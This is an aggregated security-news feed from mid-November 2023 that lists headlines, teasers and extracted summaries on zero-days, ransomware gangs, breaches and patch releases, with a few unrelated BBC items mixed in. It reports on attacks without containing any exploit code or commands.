            2023-11-17 https://www.bleepingcomputer.com/news/security/google-hackers-exploited-zimbra-zero-day-in-attacks-on-govt-orgs/
            Hackers leveraged a medium-severity security issue now identified as CVE-2023-37580 since June 29, nearly a month before the vendor addressed it in version 8.8.15 Patch 41 of the software on July 25. [...]

            Autosummary: Attack and response timeline. According to Google's threat analysts, the threat actors exploited the vulnerability on government systems in Greece, Moldova, Tunisia, Vietnam, and Pakistan to steal email data, user credentials, and authentication tokens, perform email forwarding, and lead victims to phishing pages.


            CISA warns of actively exploited Windows, Sophos, and Oracle bugs

            exploits
            2023-11-17 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-windows-sophos-and-oracle-bugs/
            The U.S. Cybersecurity & Infrastructure Security Agency has added to its catalog of known exploited vulnerabilities (KEV) three security issues that affect Microsoft devices, a Sophos product, and an enterprise solution from Oracle. [...]


            Ransomware gang files SEC complaint about victim

            exploits
            2023-11-17 https://www.malwarebytes.com/blog/news/2023/11/ransomware-gang-files-sec-complaint-about-target
            The ALPHV/BlackCat ransomware group has filed a non-compliance complaint with the SEC against one of its victims.

            Autosummary: The referenced item (Form 8-K Item 1.05) states: “Registrants must disclose any cybersecurity incident they experience that is determined to be material, and describe the material aspects of its: – Nature, scope, and timing; and – Impact or reasonably likely impact.” Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. “It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules.”


            Critical zero-day flaws in Windows, Office mean it's time to patch

            exploits
            2023-11-17 https://www.computerworld.com/article/3710990/critical-zero-day-flaws-in-windows-office-mean-its-time-to-patch.html#tk.rss_security

            We are now in the third decade of Microsoft's monthly Patch Tuesday releases, which deliver fewer critical updates to browsers and Windows platforms — and much more reliable updates to Microsoft Office — than in the early days of patching. But this month, the company rolled out 63 updates (including fixes for three zero-days in Windows and Office).

            Updates to Microsoft Exchange and Visual Studio can be included in standard patch release cycles, while Adobe needs to be included in your "Patch Now" releases for third-party applications.

            The team at Readiness has provided a detailed infographic that outlines the risks associated with each of the updates for November.

            Autosummary: Major revisions. At this point, Microsoft has published three major revisions that require attention for this cycle, including: CVE-2023-36008: Microsoft Edge (Chromium-based). Windows. Microsoft released two critical updates and 30 patches rated important to the Windows platform that cover the following key components: Windows Hyper-V; Windows Internet Connection Sharing (ICS). Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge). All four issues (CVE-2023-36439, CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035) require full administrator access and as of now have not been reported as exploited or publicly reported. Mitigations and workarounds. Microsoft published the following vulnerability-related mitigations for this Patch Tuesday release: CVE-2023-38151: Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability. Our testing process raises a few concerns when the Windows file system has been updated, so we have included a few additional steps to validate this month's changes: Run Storage Sense (this may be your first time).


            Medusa ransomware gang claims the hack of Toyota Financial Services

            financial exploits ransomware
            2023-11-17 https://securityaffairs.com/154319/data-breach/toyota-financial-services-medusa-ransomware.html
            Toyota Financial Services discloses unauthorized activity on systems after the Medusa ransomware gang claimed to have hacked the company. Toyota Financial Services confirmed the discovery of unauthorized activity on systems in a limited number of its locations. “Toyota Financial Services Europe & Africa recently identified unauthorised activity on systems in a limited number of its […]

            Autosummary: Pierluigi Paganini, November 17, 2023. Toyota Financial Services discloses unauthorized activity on systems after the Medusa ransomware gang claimed to have hacked the company.


            The Week in Ransomware - November 17th 2023 - Citrix in the Crosshairs

            exploits ransomware
            2023-11-17 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-17th-2023-citrix-in-the-crosshairs/
            Ransomware gangs target exposed Citrix Netscaler devices using a publicly available exploit to breach large organizations, steal data, and encrypt files. [...]

            Autosummary: We also learned more about recent attacks and tactics used by ransomware threat actors, which are highlighted below. Contributors and those who provided new ransomware information and stories this week include: @serghei, @demonslay335, @billtoulas, @fwosar, @Seifreed, @malwrhunterteam, @BleepinComputer, @Ionut_Ilascu, @LawrenceAbrams, @GossiTheDog, @BrettCallow, @PogoWasRight, @pcrisk, and @NCCGroupInfosec. November 14th 2023: The LockBit ransomware attacks use publicly available exploits for the Citrix Bleed vulnerability (CVE-2023-4966) to breach the systems of large organizations, steal data, and encrypt files.


            Bloomberg Crypto X account snafu leads to Discord phishing attack

            financial
            2023-11-17 https://www.bleepingcomputer.com/news/security/bloomberg-crypto-x-account-snafu-leads-to-discord-phishing-attack/
            The official Twitter account for Bloomberg Crypto was used earlier today to redirect users to a deceptive website that stole Discord credentials in a phishing attack. [...]

            Autosummary: (Figure caption: Hijacked Bloomberg Crypto account. Source: BleepingComputer.) Upon entering the Discord server, a bot prompts visitors to use AltDentifier, an authentic Discord Verification Bot. Rather than linking to the legitimate https://altdentifier.com/ address, it presents a link to a deceptive page using an altered domain (altdentifiers[.]com) with an extra "s" at the end of the original domain name.


            Ransomware gang files SEC complaint over victim’s undisclosed breach

            exploits
            2023-11-16 https://www.bleepingcomputer.com/news/security/ransomware-gang-files-sec-complaint-over-victims-undisclosed-breach/
            The ALPHV/BlackCat ransomware operation has taken extortion to a new level by filing a U.S. Securities and Exchange Commission complaint against one of their alleged victims for not complying with the four-day rule to disclose a cyberattack. [...]

            Autosummary: “Based on our investigation to date, we have identified no evidence of unauthorized access to our production platforms, and the incident has caused minimal business interruption.” - MeridianLink. While many ransomware and extortion gangs have threatened to report breaches and data theft to the SEC, this may be the first public confirmation that they have done so.


            Russian Hackers Linked to "Largest Ever Cyber Attack" on Danish Critical Infrastructure

            rusia-ucrania
            2023-11-16 https://thehackernews.com/2023/11/russian-hackers-launch-largest-ever.html
            Russian threat actors have been possibly linked to what's been described as the "largest cyber attack against Danish critical infrastructure," in which 22 companies associated with the operation of the country's energy sector were targeted in May 2023. "22 simultaneous, successful cyberattacks against Danish critical infrastructure are not commonplace," Denmark's SektorCERT said [PDF]. "The

            Autosummary: These attacks are suspected to have weaponized two more critical bugs in Zyxel gear (CVE-2023-33009 and CVE-2023-33010, CVSS scores: 9.8) as zero-days to co-opt the firewalls into Mirai and MooBot botnets, given that patches for them were released by the company on May 24, 2023.


            FBI and CISA warn of attacks by Rhysida ransomware gang

            exploits ransomware
            2023-11-16 https://securityaffairs.com/154224/malware/fbi-cisa-rhysida-ransomware-gang.html
            The FBI and CISA warn of attacks carried out by the Rhysida ransomware group against organizations across multiple industry sectors. FBI and CISA published a joint Cybersecurity Advisory (CSA) to warn of Rhysida ransomware attacks against organizations across multiple industry sectors. The report is part of the ongoing #StopRansomware effort that disseminates advisories about tactics, techniques, and […]

            Autosummary: “Threat actors leveraging Rhysida ransomware are known to impact ‘targets of opportunity,’ including victims in the education, healthcare, manufacturing, information technology, and government sectors.” “Additionally, open source reporting [2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model.”


            CISA and FBI Issue Warning About Rhysida Ransomware Double Extortion Attacks

            exploits ransomware
            2023-11-16 https://thehackernews.com/2023/11/cisa-and-fbi-issue-warning-about.html
            The threat actors behind the Rhysida ransomware engage in opportunistic attacks targeting organizations spanning various industry sectors. The advisory comes courtesy of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC). "Observed as a ransomware-as-a-service (RaaS)

            Autosummary: According to statistics compiled by Malwarebytes, Rhysida has claimed five victims for the month of October 2023, putting it far behind LockBit (64), NoEscape (40), PLAY (36), ALPHV/BlackCat (29), and 8BASE (21).


            Hackers Could Exploit Google Workspace and Cloud Platform for Ransomware Attacks

            exploits ransomware
            2023-11-16 https://thehackernews.com/2023/11/hackers-could-exploit-google-workspace.html
            A set of novel attack methods has been demonstrated against Google Workspace and the Google Cloud Platform that could be potentially leveraged by threat actors to conduct ransomware, data exfiltration, and password recovery attacks. "Starting from a single compromised machine, threat actors could progress in several ways: they could move to other cloned machines with GCPW installed, gain access

            Autosummary: "Starting from a single compromised machine, threat actors could progress in several ways: they could move to other cloned machines with GCPW installed, gain access to the cloud platform with custom permissions, or decrypt locally stored passwords to continue their attack beyond the Google ecosystem," Martin Zugec, technical solutions director at Bitdefender, said in a new report.


            Fortinet warns of critical command injection bug in FortiSIEM

            exploits
            2023-11-16 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-command-injection-bug-in-fortisiem/
            Fortinet is alerting customers of a critical OS command injection vulnerability in the FortiSIEM report server that could be exploited by remote, unauthenticated attackers to execute commands through specially crafted API requests. [...]

            Autosummary: It is used in businesses of all sizes in the healthcare, financial, retail, e-commerce, government, and public sectors.


            Alarm system cyberattack leaves those in need struggling to call for help

            ciber
            2023-11-16 https://www.malwarebytes.com/blog/news/2023/11/alarm-system-cyberattack-leaves-those-in-need-struggling-to-call-for-help
            An alarm system company that allows people to call for help at the touch of a button has suffered a cyberattack, causing serious disruption.

            Autosummary: Now you can enable Emergency SOS: in Safety & emergency, toggle Use Emergency SOS, set the Use Emergency SOS slider to enabled, confirm the setting and select what information you want to share. The alarm button systems are used in situations where people that require care are not constantly surrounded by caregivers, like care homes that provide independent living, elderly who live at home but need the ability to call for help, and people with a heightened risk of falling.


            Zero-Day Flaw in Zimbra Email Software Exploited by Four Hacker Groups

            exploits
            2023-11-16 https://thehackernews.com/2023/11/zero-day-flaw-in-zimbra-email-software.html
            A zero-day flaw in the Zimbra Collaboration email software was exploited by four different groups in real-world attacks to pilfer email data, user credentials, and authentication tokens. "Most of this activity occurred after the initial fix became public on GitHub," Google Threat Analysis Group (TAG) said in a report shared with The Hacker News. The flaw, tracked as CVE-2023-37580 (CVSS score:

            Autosummary: "The discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public, demonstrates the importance of organizations applying fixes to their mail servers as soon as possible," TAG said.


            Experts Uncover DarkCasino: New Emerging APT Threat Exploiting WinRAR Flaw

            exploits
            2023-11-16 https://thehackernews.com/2023/11/experts-uncover-darkcasino-new-emerging.html
            A hacking group that leveraged a recently disclosed security flaw in the WinRAR software as a zero-day has now been categorized as an entirely new advanced persistent threat (APT). Cybersecurity company NSFOCUS has described DarkCasino as an "economically motivated" actor that first came to light in 2021. "DarkCasino is an APT threat actor with strong technical and learning ability, who is good

            Autosummary: Multiple threat actors have joined the CVE-2023-38831 exploitation bandwagon in recent months, including APT28, APT40, Dark Pink, Ghostwriter, Konni, and Sandworm.


            Samsung suffered a new data breach

            financial
            2023-11-16 https://securityaffairs.com/154251/data-breach/samsung-data-breach-2.html
            Samsung Electronics disclosed a data breach that exposed customer personal information to an unauthorized individual. Samsung Electronics suffered a data breach that exposed the personal information of some of its customers to an unauthorized individual. The security breach was discovered on November 13, 2023, and impacted customers who made purchases from the Samsung UK online […]

            Autosummary: The security breach was discovered on November 13, 2023, and impacted customers who made purchases from the Samsung UK online store between July 1, 2019, and June 30, 2020. The previous one occurred in late July 2023 – discovered on August 4 – when hackers accessed and stole Samsung customers’ names, contacts and demographic information, dates of birth, and product registration data.


            Toyota confirms breach after Medusa ransomware threatens to leak data

            exploits ransomware
            2023-11-16 https://www.bleepingcomputer.com/news/security/toyota-confirms-breach-after-medusa-ransomware-threatens-to-leak-data/
            Toyota Financial Services (TFS) has confirmed that it detected unauthorized access on some of its systems in Europe and Africa after Medusa ransomware claimed an attack on the company. [...]

            Autosummary: To prove the intrusion, the hackers published sample data that includes financial documents, spreadsheets, purchase invoices, hashed account passwords, cleartext user IDs and passwords, agreements, passport scans, internal organization charts, financial performance reports, staff email addresses, and more.


            Zimbra zero-day exploited to steal government emails by four groups

            exploits government
            2023-11-16 https://securityaffairs.com/154277/apt/zimbra-zero-day-govt-emails.html
            Google TAG revealed that threat actors exploited a Zimbra Collaboration Suite zero-day (CVE-2023-37580) to steal emails from governments. Google Threat Analysis Group (TAG) researchers revealed that a zero-day vulnerability, tracked as CVE-2023-37580 (CVSS score: 6.1), in the Zimbra Collaboration email software was exploited by four different threat actors to steal email data, user credentials, and authentication tokens […]

            Autosummary: Google Threat Analysis Group (TAG) researchers revealed that a zero-day vulnerability, tracked as CVE-2023-37580 (CVSS score: 6.1), in the Zimbra Collaboration email software was exploited by four different threat actors to steal email data, user credentials, and authentication tokens from government organizations.


            Long Beach, California turns off IT systems after cyberattack

            ciber
            2023-11-16 https://www.bleepingcomputer.com/news/security/long-beach-california-turns-off-it-systems-after-cyberattack/
            The City of Long Beach in California is warning that they suffered a cyberattack on Tuesday that has led them to shut down portions of their IT network to prevent the attack's spread. [...]

            Autosummary: Emsisoft threat analyst Brett Callow, who tracks attacks on local government in the United States, told BleepingComputer that if this turns out to be ransomware, it would be the 80th local government to suffer a ransomware attack in 2023.


            FBI shares tactics of notorious Scattered Spider hacker collective

            industry
            2023-11-16 https://www.bleepingcomputer.com/news/security/fbi-shares-tactics-of-notorious-scattered-spider-hacker-collective/
            The Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency released an advisory about the evasive threat actor tracked as Scattered Spider, a loosely knit hacking collective that now collaborates with the ALPHV/BlackCat Russian ransomware operation. [...]

            Autosummary: Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, Scatter Swine, Octo Tempest, and Muddled Libra, is adept at social engineering and relies on phishing, multi-factor authentication push bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations. Tools listed in the advisory (tool name and purpose): Remote web server access via internet tunneling; Pulseway: Remote system monitoring and management; ScreenConnect: Network device remote connection management; Splashtop: Network device remote connection management; Tactical.


            Organizations should prepare for the inevitability of cyberattacks on their infrastructure

            ciber
            2023-11-15 https://www.helpnetsecurity.com/2023/11/15/attack-surface-complexity/

            Organizations' reliance on technology has contributed to the fact that their attack surface has grown in size and complexity, according to Armis. Global organizations are facing an unprecedented level of cyber risk due to blind spots in their environment, and security teams are being overwhelmed with significant amounts of threat intelligence data lacking actionable insights. As a result, 61% of organizations confirmed they had been breached at least once over the last 12 months, … More

            Autosummary: “Armis continues to warn about the evolving threat landscape and the impact of malicious cyberattacks targeting global organizations, national governments, state and local entities and society overall,” said Curtis Simpson, CISO, Armis.


            Urgent: VMware Warns of Unpatched Critical Cloud Director Vulnerability

            exploits
            2023-11-15 https://thehackernews.com/2023/11/urgent-vmware-warns-of-unpatched.html
            VMware is warning of a critical and unpatched security flaw in Cloud Director that could be exploited by a malicious actor to get around authentication protections. Tracked as CVE-2023-34060 (CVSS score: 9.8), the vulnerability impacts instances that have been upgraded to version 10.5 from an older version. "On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with


            Brazil: Health warnings as country gripped by "unbearable" heatwave

            latam government
            2023-11-15 https://www.bbc.co.uk/news/world-latin-america-67422663?at_medium=RSS&at_campaign=KARANGA
            More than a hundred million people are thought to have been affected by the extreme weather.


            Mexico: Murder suspected in non-binary magistrate Jesús Ociel Baena's death

            latam
            2023-11-15 https://www.bbc.co.uk/news/world-latin-america-67422661?at_medium=RSS&at_campaign=KARANGA
            Mexican authorities say they suspect Jesús Ociel Baena was killed by their partner, who also died.


            Nuclear and oil & gas are major targets of ransomware groups in 2024

            exploits ransomware industry
            2023-11-15 https://www.helpnetsecurity.com/2023/11/15/2024-ransomware-groups-targets/

            Resecurity, Inc. (USA), which protects major Fortune 100 companies and government agencies globally, has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware attackers have targeted energy installations in North America, Asia, and the European Union. In the EU, Handelsblatt reported that ransomware attacks targeting the energy sector more than doubled in 2022 over the previous year, with defenders recording 21 attacks through …


            Reptar: New Intel CPU Vulnerability Impacts Multi-Tenant Virtualized Environments

            exploits
            2023-11-15 https://thehackernews.com/2023/11/reptar-new-intel-cpu-vulnerability.html
            Intel has released fixes to close out a high-severity flaw codenamed Reptar that impacts its desktop, mobile, and server CPUs. Tracked as CVE-2023-23583 (CVSS score: 8.8), the issue has the potential to "allow escalation of privilege and/or information disclosure and/or denial of service via local access." Successful exploitation of the vulnerability could also permit a bypass of the CPU's


            Alert: Microsoft Releases Patch Updates for 5 New Zero-Day Vulnerabilities

            exploits
            2023-11-15 https://thehackernews.com/2023/11/alert-microsoft-releases-patch-updates.html
            Microsoft has released fixes to address 63 security bugs in its software for the month of November 2023, including three vulnerabilities that have come under active exploitation in the wild. Of the 63 flaws, three are rated Critical, 56 are rated Important, and four are rated Moderate in severity. Two of them have been listed as publicly known at the time of the release. The updates are in

            Autosummary: Windows SmartScreen Security Feature Bypass Vulnerability; CVE-2023-36033 (CVSS score: 7.8) - Windows DWM Core Library Elevation of Privilege Vulnerability; CVE-2023-36036 (CVSS score: 7.8) - Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability; CVE-2023-36038 (CVSS score: 8.2) - ASP.NET Core Denial of Service Vulnerability; CVE-2023-36413 (CVSS score: 6.5) - Microsoft Office Security Feature Bypass Vulnerability. Both CVE-2023-36033 and CVE-2023-36036 could be exploited by an attacker to gain SYSTEM privileges, while CVE-2023-36025 could make it possible to bypass Windows Defender SmartScreen checks and their associated prompts.


            ThreatModeler 7.0 brings AI to threat modeling

            financial
            2023-11-15 https://www.helpnetsecurity.com/2023/11/15/threatmodeler-7-0/

            ThreatModeler released ThreatModeler, Version 7.0, bringing several new capabilities, including ThreatModeler WingMan (AI assistant), to help streamline the threat modeling process for software security and DevOps teams. ThreatModeler 7.0 enables faster and more consistent threat modeling with features such as intelligent embedded machine learning and AI, increased real-time collaboration, customizable risk analysis and a raft of enterprise-grade features for organizations with complex multi-tier environments and large developer and security teams. Introducing ThreatModeler WingMan. Key patented …

            Autosummary: Together, the ThreatModeler platform, IaC-Assist, and Cloud Modeler tools allow any organization to collaborate, review, and ensure they have a complete view of their active threat surface — in real-time.


            Resecurity enhances cybersecurity in the Middle East

            ciber
            2023-11-15 https://www.helpnetsecurity.com/2023/11/15/resecurity-idp-solution-middle-east/

            In a significant stride towards fortifying the cybersecurity landscape in the Middle East, Resecurity introduced its Digital Identity Protection (IDP) solution. This strategic move aligns with Resecurity’s commitment to creating a safer digital society and empowering individuals and businesses in the region to counteract cyber threats effectively. Resecurity’s advanced Digital Identity Protection Recognizing the escalating cyber threats in the Middle East, Resecurity’s IDP solution is poised to play a pivotal role in safeguarding the digital …


            Radiant Security raises $15 million to expand engineering and go-to-market capacity

            government
            2023-11-15 https://www.helpnetsecurity.com/2023/11/15/radiant-security-funding-15-million/

            Radiant Security announced the successful closure of a $15 million Series A funding round. This strategic financing, led by Next47, reaffirms the soaring demand for AI-based solutions that address the longstanding challenges faced by Security Operations Centers (SOCs). In addition to Next47, the funding round included participation from all previous investors, including Lightspeed Venture Partners, Acrew Capital, Uncorrelated Ventures, and Jibe Ventures. In addition, the company’s Series A welcomes a new investor, General Advance. “This …

            Autosummary: “By integrating Radiant’s AI-powered SOC co-pilot into our internal SOC, RFA is now leveraging AI to provide unmatched security outcomes in terms of capacity, speed, and accuracy,” remarked Grigory Mils, CIO of RFA.


            PJ&A says cyberattack exposed data of nearly 9 million patients

            ciber
            2023-11-15 https://www.bleepingcomputer.com/news/security/pj-and-a-says-cyberattack-exposed-data-of-nearly-9-million-patients/
            PJ&A (Perry Johnson & Associates) is warning that a cyberattack in March 2023 exposed the personal information of almost nine million patients. [...]


            Keysight Elastic Network Generator facilitates collaborative and flexible network continuous validation

            ransomware
            2023-11-15 https://www.helpnetsecurity.com/2023/11/15/keysight-elastic-network-generator/

            Keysight Technologies has introduced a first-in-its-class advancement in network testing with the new Keysight Elastic Network Generator (KENG) software – an agile, composable network test platform based on an open, vendor-neutral API and designed for continuous integration (CI). While traditional networking environments often rely on proprietary testing solutions, closed test systems create challenges for engineers and network architects since they operate in isolation and lack interoperability and flexibility. This lack of compatibility makes it …

            Autosummary: Its open, disaggregated and API-first design has been field tested and proven to be ideal for modern DevOps,” Ram Periakaruppan, VP and GM, Network Test & Security Solutions, Keysight, concluded.


            U.S. Takes Down IPStorm Botnet, Russian-Moldovan Mastermind Pleads Guilty

            rusia-ucrania
            2023-11-15 https://thehackernews.com/2023/11/us-takes-down-ipstorm-botnet-russian.html
            The U.S. government on Tuesday announced the takedown of the IPStorm botnet proxy network and its infrastructure, as the Russian and Moldovan national behind the operation pleaded guilty. "The botnet infrastructure had infected Windows systems then further expanded to infect Linux, Mac, and Android devices, victimizing computers and other electronic devices around the world, including in Asia,


            New PoC Exploit for Apache ActiveMQ Flaw Could Let Attackers Fly Under the Radar

            exploits
            2023-11-15 https://thehackernews.com/2023/11/new-poc-exploit-for-apache-activemq.html
            Cybersecurity researchers have demonstrated a new technique that exploits a critical security flaw in Apache ActiveMQ to achieve arbitrary code execution in memory. Tracked as CVE-2023-46604 (CVSS score: 10.0), the vulnerability is a remote code execution bug that could permit a threat actor to run arbitrary shell commands. It was patched by Apache in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6,


            Brazil: dangerous heatwave continues

            latam ransomware
            2023-11-15 https://www.bbc.co.uk/weather/features/67429874?at_medium=RSS&at_campaign=KARANGA
            The extreme and long-lasting heat, which has brought temperatures which feel like more than 50C, is set to continue for a few more days.


            Toronto Public Library confirms data stolen in ransomware attack

            exploits ransomware
            2023-11-15 https://www.bleepingcomputer.com/news/security/toronto-public-library-confirms-data-stolen-in-ransomware-attack/
            The Toronto Public Library (TPL) confirmed that the personal information of employees, customers, volunteers, and donors was stolen from a compromised file server during an October ransomware attack. [...]

            Autosummary: Since it surfaced, the Russian-speaking ransomware gang has breached and extorted a wide range of high-profile victims, including the American Dental Association, Sobeys, Knauf, Yellow Pages Canada, UK outsourcing company Capita, the Rheinmetall German defense contractor, and most recently, U.S. government contractor ABB.


            FBI and CISA warn of opportunistic Rhysida ransomware attacks

            exploits ransomware
            2023-11-15 https://www.bleepingcomputer.com/news/security/fbi-and-cisa-warn-of-opportunistic-rhysida-ransomware-attacks/
            The FBI and CISA warned today of Rhysida ransomware gang's opportunistic attacks targeting organizations across multiple industry sectors. [...]


            Samsung hit by new data breach impacting UK store customers

            financial
            2023-11-15 https://www.bleepingcomputer.com/news/security/samsung-hit-by-new-data-breach-impacting-uk-store-customers/
            Samsung Electronics is notifying some of its customers of a data breach that exposed their personal information to an unauthorized individual. [...]


            Ransomware review: November 2023

            exploits
            2023-11-15 https://www.malwarebytes.com/blog/threat-intelligence/2023/11/ransomware-review-november-2023
            In September, two high-profile casino breaches taught us about the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation.

            Autosummary: [Charts: known ransomware attacks by ransomware group, by country, and by industry sector, October 2023.] In other October news, Resilience, a cyber insurance company, reported that 48% of all MOVEit cyberattack victims in its client base during the first half of 2023 were from the education sector. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Major stories for the month included the takedown of several high-profile groups, including alleged Sony Systems attacker RansomedVC, new data shedding light on Cl0p’s education sector bias, and a deep-dive revealing the danger of the group behind September’s infamous casino attacks. Last month three major ransomware groups—RansomedVC, Ragnar, and Trigona—were shut down, the first two by law enforcement and the third by Ukrainian hacktivists.


            Update now! Microsoft patches 3 actively exploited zero-days

            exploits
            2023-11-15 https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2023/11/update-now-microsoft-patches-3-actively-exploited-zero-days
            Microsoft has patched a total of 63 vulnerabilities this Patch Tuesday. Make sure you update as soon as you can.

            Autosummary: Adobe has released security updates to address vulnerabilities affecting multiple Adobe products: APSB23-52 (Adobe ColdFusion), APSB23-53 (Adobe RoboHelp Server), APSB23-54 (Adobe Acrobat and Reader), APSB23-55 (Adobe InDesign), APSB23-56 (Adobe Photoshop), APSB23-57 (Adobe Bridge), APSB23-58 (Adobe FrameMaker Publishing Server), APSB23-60 (Adobe InCopy), APSB23-61 (Adobe Animate), APSB23-62 (Adobe Dimension), APSB23-63 (Adobe Media Encoder), APSB23-64 (Adobe Audition), APSB23-65 (Adobe Premiere Pro), APSB23-66 (Adobe After Effects). Android’s November updates were released by Google. The zero-days patched in these updates are listed as: CVE-2023-36025: a Windows SmartScreen security feature bypass vulnerability that would allow an attacker to bypass Windows Defender SmartScreen checks and their associated prompts.


            New Samsung data breach impacts UK store customers

            financial
            2023-11-15 https://www.bleepingcomputer.com/news/security/new-samsung-data-breach-impacts-uk-store-customers/
            Samsung Electronics is notifying some of its customers of a data breach that exposed their personal information to an unauthorized individual. [...]


            Jesús Ociel Baena: Mexico's first non-binary magistrate found dead

            latam
            2023-11-14 https://www.bbc.co.uk/news/world-latin-america-67411737?at_medium=RSS&at_campaign=KARANGA
            It is unclear if the deaths of Jesús Ociel Baena and another person were intentional.


            10 corporate cybersecurity blogs worth your time

            ciber
            2023-11-14 https://www.helpnetsecurity.com/2023/11/14/corporate-cybersecurity-blogs/

            In this article, we’ve curated a list of insightful corporate cybersecurity blogs that provide analysis and actionable advice to help you keep your company’s digital assets secure. This list is not meant to be exhaustive since thousands of companies have infosec blogs, so presented here are the ones that we read regularly. AWS Security Amazon Web Services (AWS) is a broadly adopted cloud, offering over 200 featured services from data centers globally. AT&T Cybersecurity AT&T …


            Collaborative strategies are key to enhanced ICS security

            industry
            2023-11-14 https://www.helpnetsecurity.com/2023/11/14/marko-gulan-schneider-electric-industrial-control-systems-security/

            In this Help Net Security interview, Marko Gulan, Cyber Security Consultant at Schneider Electric, discusses the complexities of safeguarding industrial control systems (ICS). Our conversation will explore the importance of cross-departmental collaboration, balancing security with system functionality, and the dynamic nature of security measures that evolve with emerging threats. We’ll also look at the critical synergy between IT and OT departments and the role of the IEC 62443 standards in staying ahead in the threat …

            Autosummary: The IT department is usually responsible for managing computer systems, networks, and data, while the OT department manages operating systems, industrial control systems, and sensors. In addition, the IEC 62443 standard also promotes cooperation between various stakeholders, including manufacturers, operators, system integrators and security professionals. This includes the application of technical security controls, such as firewalls, antivirus programs, encryption, and access controls.


            Vietnamese Hackers Using New Delphi-Powered Malware to Target Indian Marketers

            exploits
            2023-11-14 https://thehackernews.com/2023/11/vietnamese-hackers-using-new-delphi.html
            The Vietnamese threat actors behind the Ducktail stealer malware have been linked to a new campaign that ran between March and early October 2023, targeting marketing professionals in India with an aim to hijack Facebook business accounts. "An important feature that sets it apart is that, unlike previous campaigns, which relied on .NET applications, this one used Delphi as the programming

            Autosummary: "Defendants distribute links to their malware through social media posts, ads (i.e., sponsored posts), and pages, each of which purport to offer downloadable versions of Bard or other Google AI products," the company alleged in its complaint.


            6clicks helps organizations manage and report on material cybersecurity events

            ciber
            2023-11-14 https://www.helpnetsecurity.com/2023/11/14/6clicks-grc-platform/

            6clicks announced that it has added SEC Form 8-K content required for event tracking to its incident management module in its GRC platform to help organizations meet new SEC disclosure requirements for qualified cybersecurity events. The new content support empowers organizations to gather relevant incident details and provide a centralized, single source of truth while enabling tracking through the required steps when a qualifying event occurs. Using these details, the platform makes it easy to …

            Autosummary: The new SEC reporting requirements are now included for filings including Forms 8-K, 10-K, and 20-F. Companies must provide details of cybersecurity events and disclose an incident’s nature, scope, and timing, as well as its material impact or reasonably likely material impact on the company.


            The Importance of Continuous Security Monitoring for a Robust Cybersecurity Strategy

            ransomware ciber
            2023-11-14 https://thehackernews.com/2023/11/the-importance-of-continuous-security.html
            In 2023, the global average cost of a data breach reached $4.45 million. Beyond the immediate financial loss, there are long-term consequences like diminished customer trust, weakened brand value, and derailed business operations. In a world where the frequency and cost of data breaches are skyrocketing, organizations are coming face-to-face with a harsh reality: traditional cybersecurity

            Autosummary: Ongoing discovery, monitoring, and analysis of your external exposure, including domains, websites, hosts, services, etc. It proactively scouts for vulnerabilities, irregularities, misconfigurations, and potential threats, ensuring swift detection and response.


            New Campaign Targets Middle East Governments with IronWind Malware

            exploits government
            2023-11-14 https://thehackernews.com/2023/11/new-campaign-targets-middle-east.html
            Government entities in the Middle East are the target of new phishing campaigns that are designed to deliver a new initial access downloader dubbed IronWind. The activity, detected between July and October 2023, has been attributed by Proofpoint to a threat actor it tracks under the name TA402, which is also known as Molerats, Gaza Cyber Gang, and shares tactical overlaps with a pro-Hamas


            Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024

            exploits ransomware industry
            2023-11-14 https://securityaffairs.com/154113/malware/ransomware-gangs-targets-nuclear-and-oil-gas-2024.html

            Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities. Resecurity, Inc. (USA), which protects major Fortune 100 companies and government agencies globally, has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware […]

            Autosummary: Pierluigi Paganini, November 14, 2023. Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities.


            DirectDefense ThreatAdvisor 3.0 offers continuous security monitoring and management

            ransomware
            2023-11-14 https://www.helpnetsecurity.com/2023/11/14/directdefense-threatadvisor-3-0/

            DirectDefense launched ThreatAdvisor 3.0, its proprietary security orchestration, automation and response (SOAR) platform. Designed to improve the speed, efficiency, and accuracy of DirectDefense’s Security Operations Center (SOC), ThreatAdvisor 3.0 offers continuous security monitoring and management, automates manual processes, and includes an extensive knowledge base for compliance, security events and mitigation techniques. Together with DirectDefense’s white glove approach, ThreatAdvisor is customized for each client based on its unique needs. “The volume and velocity of security threats …


            Amazon latest firm to cut jobs in gaming industry

            industry
            2023-11-14 https://www.bbc.co.uk/news/technology-67417330?at_medium=RSS&at_campaign=KARANGA
            It has been a banner year for video games, yet studios continue to sack staff.


            New CacheWarp AMD CPU attack lets hackers gain root in Linux VMs

            Linux
            2023-11-14 https://www.bleepingcomputer.com/news/security/new-cachewarp-amd-cpu-attack-lets-hackers-gain-root-in-linux-vms/
